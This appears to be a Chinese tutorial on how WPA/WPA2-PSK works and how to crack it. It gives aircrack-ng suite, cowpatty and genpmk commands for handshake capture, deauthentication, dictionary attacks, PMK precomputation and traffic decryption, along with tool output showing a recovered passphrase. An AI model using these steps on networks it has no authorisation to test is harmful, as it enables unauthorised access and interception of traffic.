2023年7月11日发(作者：)

WPAWPA2加密分析⽂章⽬录综述WPA主要采⽤的是 临时密钥完整性协议(TKIP) 加密算法，TKIP 旨在改进WEP,且⽆需依赖全新硬件来运⾏;WPA2则强制使⽤AES-CCMP算法来进⾏加密，⽐TKIP更强⼤、更坚固。WPA和WPA2⽀持两种⾝份验证机制：1. 基于EAP的⾝份验证（采⽤RADIUS服务器）—> 企业2. 基于预共享密钥（Pre-Shared Key,PSK）的⾝份验证—> 个⼈WPA加密⽅式分析WPA/WPA2 PSK极易为字典密码攻击–此种攻击需要的输⼊:⽆线客户端与AP之间的4次WPA握⼿信息，以及常⽤密码攻击字典，之后利⽤aircrack-ng之类的⼯具。WPA/WPA2 PSK 运作⽅式–>利⽤ PSK+5个参数来⽣成成对的临时密钥（PTK:Pairwise Transient Key）,然后利⽤该密钥进⾏加密⽆线AP与申请者之间的通话信道。1. ⽹络的SSID2. ⽆线AP随机数 A-Nonce(Authenticator Nonce)3. 申请者随机数 S-Nonce(Supplicant Nonce)4. ⽆线AP MAC 地址5. 申请者MAC地址通过wifi信道嗅探可以窃取整个会话过程中的所有5个参数，唯⼀不可获取的的仅为PSKPSK⽣成：由⽤户提供的WPA-PSK密码外加SSID创建⽽成WPA-PSK密码外加SSID都通过基于密码的密钥派⽣函数(Password-Based Key Derivation Function,PBKDF2)发送，该函数会输出⼀个256位的共享密钥 。密码字典攻击攻击者利⽤攻击⼯具外加⼤型的密码字典进⾏攻击。攻击⼯具会根据每个密码派⽣出⼀个256位的PSK，并⽤其与之前提及的其他参数来创建PTK。PTK将⽤来验证是否与某个握⼿数据包中的 消息完整性检查（Message Integrity Check, MIC）匹配。若匹配，则根据密码字典猜测的密码是正确的;若不匹配，则猜测的密码是错误的。开始密码（8-63位）PBKDF2(SSID)256位预置共享密钥PSK‘申请者随机数 ⽆线AP随机数 ⽆线AP的MAC地址 申请者MAC地址验证 MIC?yesno密码通过验证破解WPA-PSK同样适⽤于WPA2⽹络airodump wlan0monairodump --bsssid ap_mac -c chanel -w ~/capture/ssid wlan0mon# deauth数据包,若命令的输出中存在与信道相关的错误信息 --ignore-negative-oneaireplay-ng -0 10 -a ap_mac -c computer_mac wlan0mon --ignore-negative-oneaircrack-ng ~/capture/ssid*.cap -w /usr/share/wordlists/patty -f /usr/share/wordlists/ -r capture/fast_ -s FAST_966Ewiresharkwireshark中打开airodump-ng⼯具中捕获的数据包.cap,⽤过滤表达式筛选并查看与WPA 4次握⼿相关的数据包。WPA握⼿数据包所属的协议是EAPOLkali⾃带的密码字典cowpattycowpatty 4.8 - WPA-PSK dictionary attack. cowpatty: Must supply a pcap file with -rUsage: cowpatty [options] -f Dictionary file -d Hash file (genpmk) -r Packet capture file -s Network SSID (enclose in quotes if SSID includes spaces) -c Check for valid 4-way frames, does not crack -h Print this help information and exit -v Print verbose information (more -v for more verbosity) -V Print program version and exitroot@yue:~# cowpatty -f /usr/share/wordlists/ -r capture/fast_ -s FAST_966Ecowpatty 4.8 - WPA-PSK dictionary attack. Collected all necessary data to mount crack against WPA2/PSK ng dictionary attack. Please be PSK is "186****1111".1 passphrases tested in 0.01 seconds: 143.37 passphrases/second加快WPA/WPA2 PSK使⽤PSK密码及SSID，通过PBKDF2计算PSK，不但极为消耗CPU资源，⽽且还耗时。在输出256位PSK之前，该函数会将两者排列组合超过4096ci。下⼀步的破解涉及使⽤该密码以及四次握⼿中参数，并与握⼿中MIC进⾏⽐对验证。参数会随每次握⼿⽽异。关键： 尽快根据密码计算PSK通过预先计算PSK（也叫成对主密钥Pairwise Master Key:PMK）来加快破解进度加快速度1. 使⽤genpmk⼯具，针对特定的SSID和wordlist预先计算PMK。root@yue:~/Pictures# genpmkgenpmk 1.3 - WPA-PSK precomputation attack. genpmk: Must specify a dictionary file with -fUsage: genpmk [options] -f Dictionary file -d Output hash file -s Network SSID -h Print this help information and exit -v Print verbose information (more -v for more verbosity) -V Print program version and exitAfter precomputing the hash file, run cowpatty with the -d argument.# genpmk -f -d output_ -s ap_ssid

⽣成output_⽂件2. 利⽤cowpatty进⾏破解# cowpatty -d out_ -s ap_ssid -r ~/capture/ap_ssid*.cap解密WPA数据包root@yue:~/Pictures# airdecap-ng --help Airdecap-ng 1.5.2 - (C) 2006-2018 Thomas d'Otreppe usage: airdecap-ng [options] Common options: -l : don't remove the 802.11 header -b : access point MAC address filter -e : target network SSID -o : output file for decrypted packets (default -dec) WEP specific option: -w : target network WEP key in hex -c : output file for corrupted WEP packets (default -bad) WPA specific options: -p : target network WPA passphrase -k : WPA Pairwise Master Key in hex --help : Displays this usage screenroot@yue:~/Pictures# airdecap-ng -p 186****1111 -e FAST_966E ~/capture/fast_

Total number of stations seen 4Total number of packets read 11843Total number of WEP data packets 0Total number of WPA data packets 906Number of plaintext data packets 0Number of decrypted WEP packets 0Number of corrupted WEP packets 0Number of decrypted WPA packets 376Number of bad TKIP (WPA) packets 0解密后⽣成的⽂件为：-rw-r--r-- 1 root root 25250 Jan 4 20:44 fast_1.

临时密钥完整性协议(TKIP): Temporal Key Integrity Protocol2.

The combination of both of these is sent through the Password-Based Key Derivation Function, which outputs the 256-bit shared key.